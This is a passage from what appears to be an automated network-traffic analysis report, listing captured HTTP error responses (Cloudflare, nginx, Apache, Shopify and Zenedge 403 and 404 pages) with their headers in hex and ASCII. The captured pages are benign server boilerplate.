74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv=
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:11 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 15 Sep 2023 05:27:12 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:13 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: f49973e9-fb77-46fa-866d-8fd71adc6784CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CBYG8sacr6BhXM6qvsWWwGXy5Nti%2BmbPEs5hAO1WRPUqfMI40dOChc9dWl0d7%2Bw9pmIj%2BGGFgtbGkaVAMPVYbFBT2ytu9m8S9NhucD8z9PisvK6HYRmsbe32P8L0YYUvxg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=74.000120Server: cloudflareCF-RAY: 806e75a36dc017ed-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:15 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hHGxmm4CC1jue8JRmPtVmXDuvuWzHLyV5twYJd4BWc2a1gJH0qij0oRYnDg7AY%2FE2Zd2bnSASLlo0Ft0lfDsyXHef2MC62A5Rro95%2FnjCn%2FSbbQ2OwbsEB7XxLmicISy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e75a47cf7440d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:16 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WErrhHyv9%2B2%2FcS09jiRixViAW0Rs7l8E2VmA0TPZQ7Z3C%2B4QzlyfBoXVSeebdsqKiQb2gGx80MXL5ut3oML0R3PaDIyQeFR2aUZkt1FQGSCZO2lOn4pvmubsHdgXMG4B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e75a59d8d440d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Zen-Fury: 0dd6805f89778907f7c4c7c1b01ef90c52e982dcServer: ZENEDGEX-Cache-Status: Date: Fri, 15 Sep 2023 05:27:16 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Data Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 33 33 39 22 2c 20 31 36 39 34 37 35 35 36 33 36 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 34 37 35 35 35 37 32 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 34 34 30 30 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 46 72 69 2c 20 31 35 20 53 65 70 20 32 30 32 33 20 30 35 3a 32 39 3a 31 36 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2339", 1694755636, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1694755572 * 3.1415926535898; v = Math.floor(v); do
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:17 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:27:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rC9X1mynSiA6jymic7UvK%2FYReXaypKCYdVIsbpOhVZLyu8HsJw8zRqvQzeWF3iMLdhk2XXpLHK0LDqYenYmbmrvuna8oVUb%2BThYeuf4lHHIDji9E4qF6YYM49Qdg4ms%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e75b95cb7c477-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta htt
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 806e75c85c2bc34d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
